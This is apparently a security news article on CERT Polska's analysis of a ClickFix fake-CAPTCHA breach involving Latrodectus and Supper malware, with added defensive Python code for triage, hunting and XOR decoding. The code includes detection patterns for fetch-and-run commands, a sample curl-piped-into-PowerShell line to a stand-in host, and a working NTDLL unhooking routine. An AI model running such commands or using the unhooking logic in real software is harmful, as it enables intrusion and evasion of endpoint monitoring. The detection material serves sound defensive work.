The simple act of verifying you are not a robot has been weaponized into a devastating corporate breach. Security researchers at CERT Polska have released a detailed forensic analysis of a recent incident where a “ClickFix” fake CAPTCHA campaign successfully compromised a major enterprise network.
The breach began not with a sophisticated zero-day exploit, but with a deceptive web prompt. According to the CERT Polska report, “A few months ago we became aware that a large Polish organisation was the victim of a malware attack and the attacker was active within their network”.
The forensic trail quickly led the investigators to the initial infection vector: a fake CAPTCHA page.
Instead of asking users to identify traffic lights or crosswalks, the malicious page instructed the victim to perform a manual verification. “In this scenario, an attacker attempts to convince the victim to copy a malicious snippet and execute it using the Win+R shortcut,” the analysis explains.
By tricking the user into opening the Windows Run dialog and pasting a command (which used curl to fetch a payload and pipe it straight into PowerShell), the attackers sidestepped the usual perimeter controls: no exploit, macro or malicious attachment was involved, and the download ran under the user's own account using a tool that ships with Windows. One artifact that survives this step is the Run dialog's own history, stored under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth checking on any suspected victim.
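The two host-side checks a responder would run for this stage, as an added example that is not part of the CERT Polska report: parse the Run dialog's RunMRU history and score each entry for ClickFix indicators, and flag process-creation events (Sysmon Event ID 1 shape) where explorer.exe, the parent of anything launched from Win+R, spawns a script host with a fetch-and-run command line. The registry values, event records and the example.invalid URL are constructed.

```python
"""Added example (not from the CERT Polska report): triage ClickFix-style
Run-dialog abuse from two host artifacts.

1. RunMRU: the Run dialog (Win+R) stores what the user typed under
   HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU as
   values "a", "b", ... of the form "<command>\\1", with "MRUList" giving
   the most-recent-first order. SAMPLE_RUNMRU is constructed to look like
   an export of that key.
2. Process-creation events (Sysmon Event ID 1 fields): commands typed into
   the Run dialog are spawned by explorer.exe, so a script host launched by
   explorer.exe with a fetch-and-run command line is the matching signal.
"""
import re

# Indicators common to ClickFix lures; extend with your own.
CLICKFIX_PATTERNS = [
    (r"\bcurl\b.*\|\s*(iex|invoke-expression)\b", "curl piped into PowerShell"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b", "PowerShell web download"),
    (r"\b(iex|invoke-expression)\b", "Invoke-Expression"),
    (r"\bmshta(\.exe)?\b\s+https?://", "mshta fetching a remote HTA"),
    (r"-w(indowstyle)?\s+hidden\b", "hidden window"),
    (r"-(ep|executionpolicy)\s+bypass\b", "ExecutionPolicy bypass"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
]
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe")

def score_command(cmd: str) -> list[str]:
    """Return the ClickFix indicators matched by one command line."""
    return [why for rx, why in CLICKFIX_PATTERNS if re.search(rx, cmd, re.I)]

def parse_runmru(values: dict[str, str]) -> list[str]:
    """Run-dialog history, most recent first, from the RunMRU value map."""
    order = values.get("MRUList", "")
    return [values[k].removesuffix("\\1") for k in order if k in values]

def triage_runmru(values: dict[str, str]) -> list[tuple[str, list[str]]]:
    """RunMRU entries that carry at least one indicator, with the reasons."""
    return [(cmd, hits) for cmd in parse_runmru(values) if (hits := score_command(cmd))]

def flag_process_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Script hosts spawned by explorer.exe whose command line carries indicators."""
    flagged = []
    for ev in events:
        parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
        image = ev["Image"].lower().rsplit("\\", 1)[-1]
        if parent == "explorer.exe" and image in SCRIPT_HOSTS:
            hits = score_command(ev["CommandLine"])
            if hits:
                flagged.append((ev["CommandLine"], hits))
    return flagged

SAMPLE_RUNMRU = {  # constructed RunMRU export
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "curl http://example.invalid/v | iex"\\1',
}
SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 records
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "curl http://example.invalid/v | iex"'},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad"},
    {"ParentImage": "C:\\Program Files\\Microsoft VS Code\\Code.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -NoLogo"},
]

if __name__ == "__main__":
    for cmd, hits in triage_runmru(SAMPLE_RUNMRU):
        print("RunMRU:", cmd, "->", ", ".join(hits))
    for cmd, hits in flag_process_events(SAMPLE_EVENTS):
        print("Process:", cmd, "->", ", ".join(hits))
```

On a live host the RunMRU map comes from exporting that key per user hive (ntuser.dat for offline images), and the event records from the Sysmon or EDR telemetry. The third sample event, PowerShell started by an editor, is left unflagged on purpose: the parent-process condition is what keeps ordinary scripting from drowning the real hits.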
Interestingly, the attackers’ operational security wasn’t flawless. While analyzing the malicious JavaScript, researchers found a Telegram bot token that was too short to be valid. CERT Polska noted: “It’s possible that a mistake was made, but we also consider the option that the code was generated by an LLM and not modified”.
Once the PowerShell command executed, the attackers deployed the Latrodectus malware (specifically version 2.3) using a technique known as DLL side-loading.
The malware used legitimate Windows binaries to load a malicious file named wtsapi32.dll from the %APPDATA%\Intel directory. wtsapi32.dll is a genuine Windows DLL that normally lives in System32; a file of that name sitting in a user-writable profile directory is therefore a strong indicator on its own, and the legitimate host binary that loaded it will show up as the parent in process telemetry.
Latrodectus came heavily armed with anti-analysis mechanisms to thwart defenders. It refused to run when loaded through standard testing hosts such as rundll32.exe or regsvr32.exe, which blocks the quickest way to detonate a DLL in a sandbox. Its most evasive maneuver, however, involved memory manipulation.
“The most challenging one was NTDLL unhooking, reading ntdll.dll from disk and manually importing it into the process, bypassing typical AV and debugger detection mechanics,” the researchers revealed. User-mode security products commonly watch a process by placing inline hooks on ntdll.dll exports; by loading a clean copy of ntdll.dll from disk and using that instead, the malware removes those hooks from its own view, which also defeats debuggers and sandboxes that depend on them. The CERT Polska team ultimately defeated this by dumping process memory immediately after the load sequence, recovering the decrypted imports and strings from the dump.
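The comparison that sits at the centre of both NTDLL unhooking and hook detection, as an added example that is neither Latrodectus code nor CERT Polska's tooling: a clean .text section as read from disk is diffed export by export against the live copy, a JMP rel32 prologue identifies an inline hook and its target, and the clean bytes are copied back. The byte strings and the export table are constructed stand-ins; parsing the PE export table and applying relocations to find each export's offset is assumed already done.

```python
"""Added example, not code from the CERT Polska report or from Latrodectus:
the comparison that both an unhooking loader and a hook detector perform.
User-mode security products commonly patch the first bytes of ntdll exports
with a JMP into their own code; a loader that reads a clean ntdll.dll from
disk can diff each export's prologue against the live copy and overwrite it.
The bytes below are constructed stand-ins for a .text section; locating each
export's offset (PE export-table parsing, relocation) is assumed done and is
represented by the EXPORTS table.
"""
import struct

# Constructed table: export name -> offset of its stub within .text, and the
# made-up syscall number each stub loads.
EXPORTS = {"NtAllocateVirtualMemory": 0x10, "NtProtectVirtualMemory": 0x30, "NtClose": 0x50}
SSNS = {"NtAllocateVirtualMemory": 0x18, "NtProtectVirtualMemory": 0x50, "NtClose": 0x0F}
TEXT_SIZE = 0x100
HOOK_TRAMPOLINE = 0xC0  # where the pretend EDR placed its handler
PROLOGUE_LEN = 8        # bytes compared per export; covers a 5-byte JMP

def syscall_stub(ssn: int) -> bytes:
    """Simplified x64 stub: mov r10, rcx ; mov eax, SSN ; syscall ; ret."""
    return b"\x4c\x8b\xd1\xb8" + struct.pack("<I", ssn) + b"\x0f\x05\xc3"

def jmp_rel32(src: int, dst: int) -> bytes:
    """E9 <rel32>: the inline-hook shape a user-mode EDR typically installs."""
    return b"\xe9" + struct.pack("<i", dst - (src + 5))

def build_disk_text() -> bytes:
    """Clean .text as it would be read from ntdll.dll on disk."""
    text = bytearray(b"\xcc" * TEXT_SIZE)
    for name, off in EXPORTS.items():
        stub = syscall_stub(SSNS[name])
        text[off:off + len(stub)] = stub
    return bytes(text)

def build_hooked_text(disk_text: bytes, hooked: list[str]) -> bytes:
    """Live .text after an EDR has hooked the named exports."""
    text = bytearray(disk_text)
    for name in hooked:
        off = EXPORTS[name]
        text[off:off + 5] = jmp_rel32(off, HOOK_TRAMPOLINE)
    return bytes(text)

def find_hooks(disk_text: bytes, mem_text: bytes, exports=EXPORTS) -> dict:
    """export -> (kind, jmp target or None) for every prologue that differs."""
    hooks = {}
    for name, off in exports.items():
        clean = disk_text[off:off + PROLOGUE_LEN]
        live = mem_text[off:off + PROLOGUE_LEN]
        if clean == live:
            continue
        if live[0] == 0xE9:  # relative jump: decode where the hook goes
            target = off + 5 + struct.unpack("<i", live[1:5])[0]
            hooks[name] = ("jmp rel32", target)
        else:
            hooks[name] = ("patched", None)
    return hooks

def unhook(disk_text: bytes, mem_text: bytes, exports=EXPORTS) -> bytes:
    """Restore every hooked prologue from the clean copy. A real loader does
    this on the mapped module after VirtualProtect; the quoted analysis says
    Latrodectus instead imports a whole fresh ntdll read from disk."""
    restored = bytearray(mem_text)
    for name in find_hooks(disk_text, mem_text, exports):
        off = exports[name]
        restored[off:off + PROLOGUE_LEN] = disk_text[off:off + PROLOGUE_LEN]
    return bytes(restored)

if __name__ == "__main__":
    disk = build_disk_text()
    live = build_hooked_text(disk, ["NtAllocateVirtualMemory", "NtProtectVirtualMemory"])
    for name, (kind, target) in find_hooks(disk, live).items():
        print(f"{name}: {kind}" + (f" -> 0x{target:x}" if target is not None else ""))
    print("hooks after restore:", find_hooks(disk, unhook(disk, live)))
```

Two caveats for anyone turning this into a real check: the on-disk file is file-aligned and unrelocated, so the clean copy must be mapped the way the loader maps it before offsets line up, and removing inline hooks only blinds user-mode monitoring; kernel callbacks and ETW-based telemetry still see the process, which is one reason the memory dump the researchers took still contained everything they needed.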
Latrodectus was merely the door-opener. Deeper forensic analysis uncovered two additional packed DLLs belonging to the Supper malware family, an implant often utilized as a precursor to ransomware deployment.
To ensure they never lost access, the attackers established persistence by registering Supper as a scheduled task named “GoogleUpdateTask”, a name chosen to blend in with the legitimate Google Update tasks (GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA) present on most Windows hosts.
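Two host hunts for the artifacts in the preceding paragraphs, added here as an example and not taken from the report: a system DLL name (wtsapi32.dll) found outside the system directories, which is the side-loading tell, and scheduled tasks whose action runs from a user-writable path or whose name borrows the Google Update name without pointing at Google's install directory. The file listing and task export are constructed; the assumed output shape of a task enumeration is a list of name/action pairs.

```python
"""Added example, not from the report: two host hunts for the artifacts above,
a system-DLL name sitting outside the system directories (side-loading) and
scheduled tasks whose action runs from a user-writable path or whose name
imitates Google Update. Inputs are constructed lists standing in for a file
listing and a scheduled-task export (name plus the executable it runs)."""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Windows DLLs frequently abused for side-loading; wtsapi32.dll is the one the
# report names. Build the full set from a clean System32 inventory.
KNOWN_SYSTEM_DLLS = {"wtsapi32.dll", "version.dll", "dbghelp.dll", "userenv.dll", "cryptbase.dll"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")

def suspicious_dll_paths(paths: list[str]) -> list[str]:
    """Paths whose file name is a known system DLL but that live outside SYSTEM_DIRS."""
    out = []
    for p in paths:
        low = p.lower()
        if ntpath.basename(low) in KNOWN_SYSTEM_DLLS and not low.startswith(SYSTEM_DIRS):
            out.append(p)
    return out

def suspicious_tasks(tasks: list[dict]) -> list[tuple[str, list[str]]]:
    """(TaskName, reasons) for tasks that run from user-writable paths or
    borrow the Google Update name without Google's install path."""
    findings = []
    for t in tasks:
        action, name = t["Action"].lower(), t["TaskName"].lower()
        reasons = []
        if any(seg in action for seg in USER_WRITABLE):
            reasons.append("action runs from a user-writable path")
        if "googleupdate" in name and "\\google\\update\\" not in action:
            reasons.append("name mimics Google Update but action is not under Google\\Update")
        if reasons:
            findings.append((t["TaskName"], reasons))
    return findings

SAMPLE_DLLS = [  # constructed file listing
    "C:\\Windows\\System32\\wtsapi32.dll",
    "C:\\Users\\alice\\AppData\\Roaming\\Intel\\wtsapi32.dll",
    "C:\\Program Files\\SomeApp\\someapp.dll",
]
SAMPLE_TASKS = [  # constructed task export; Action is the executable the task runs
    {"TaskName": "GoogleUpdateTaskMachineCore",
     "Action": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe"},
    {"TaskName": "GoogleUpdateTask",
     "Action": "C:\\Users\\alice\\AppData\\Roaming\\Intel\\svc.exe"},
    {"TaskName": "OneDrive Standalone Update Task-S-1-5-21-1",
     "Action": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe"},
]

if __name__ == "__main__":
    for p in suspicious_dll_paths(SAMPLE_DLLS):
        print("side-load candidate:", p)
    for name, reasons in suspicious_tasks(SAMPLE_TASKS):
        print("task:", name, "->", "; ".join(reasons))
```

The OneDrive entry is a deliberate false positive: legitimate software does update itself from AppData\Local, so the path test alone is a triage filter, and an Authenticode signer check or allowlist on the action binary should sit in front of any alert. The impersonation test, by contrast, fires only on the "GoogleUpdateTask" entry, whose action lives in the same %APPDATA%\Intel directory the report associates with the side-loaded DLL.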
The CERT Polska team managed to reverse-engineer Supper’s command-and-control (C2) communication protocol. They found that the malware masks its traffic with a custom encryption algorithm followed by a one-byte XOR with the key “M” (0x4D); the XOR layer adds no real secrecy, so once the custom layer was understood the traffic could be both read and forged. By reimplementing the protocol, the researchers were able to interact with the C2 infrastructure, mapping out additional malicious IP addresses and identifying “decoy” IPs intended to confuse automated analysis tools.
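The XOR layer described above, plus the two ways an analyst recovers an unknown single-byte XOR key from a captured blob, as an added example that is not CERT Polska's tooling. The custom cipher underneath is not described on the page and is not reproduced; the sample message format and its zero padding are constructed and are not Supper's.

```python
"""Added example, not CERT Polska's tooling. The report says Supper masks its
C2 traffic with a custom cipher followed by a one-byte XOR with 'M' (0x4D).
The custom layer is not described on the page and is not reproduced; the
code strips the XOR layer and, more generally, recovers an unknown one-byte
XOR key from a captured blob in two ways an analyst actually uses: a known
plaintext fragment (crib) and the most frequent ciphertext byte, which equals
the key wherever the plaintext carries zero padding. The plaintext format
below is constructed and is not Supper's."""
from collections import Counter

SUPPER_XOR_KEY = ord("M")  # 0x4D, as stated in the report

def xor1(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key (its own inverse)."""
    return bytes(b ^ key for b in data)

def strip_supper_xor(blob: bytes) -> bytes:
    """Remove the outer XOR layer; what remains is the custom-cipher output."""
    return xor1(blob, SUPPER_XOR_KEY)

def keys_from_crib(blob: bytes, crib: bytes) -> list[int]:
    """Every key under which the crib appears somewhere in the decoded blob.
    With a crib of a few bytes this is normally a single candidate."""
    return [k for k in range(256) if crib in xor1(blob, k)]

def key_from_padding(blob: bytes) -> int:
    """Most frequent ciphertext byte: zero-padded plaintext leaks the key,
    because 0x00 XOR key == key. Only meaningful when padding dominates."""
    return Counter(blob).most_common(1)[0][0]

# Constructed sample message with trailing zero padding (not Supper's format).
SAMPLE_PLAIN = b"host=WS-042;user=alice;cmd=idle" + b"\x00" * 16
SAMPLE_BLOB = xor1(SAMPLE_PLAIN, SUPPER_XOR_KEY)

if __name__ == "__main__":
    print("decoded:", strip_supper_xor(SAMPLE_BLOB))
    print("key via crib 'host=':", [hex(k) for k in keys_from_crib(SAMPLE_BLOB, b"host=")])
    print("key via padding:", hex(key_from_padding(SAMPLE_BLOB)))
```

The padding trick is the one to try first on a pcap: a run of identical bytes at the end of every message is almost always zero padding under the key. The crib approach is what the decoy-IP observation in the report implies in practice; once one message is understood, its fixed fields become cribs for every other capture.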
The CERT Polska analysis underscores a dangerous evolution in initial access brokering. While the technical payloads, Latrodectus and Supper, are highly sophisticated, they rely entirely on a simple user deception to gain entry.
“Although the initial vector is relatively simple, fake CAPTCHA attacks have a significant potential for large disruption, because they give attacker immediate code execution capabilities,” the report concludes. Organizations are urged to educate employees that legitimate services will never ask them to open a command prompt or the Run dialog to verify their identity.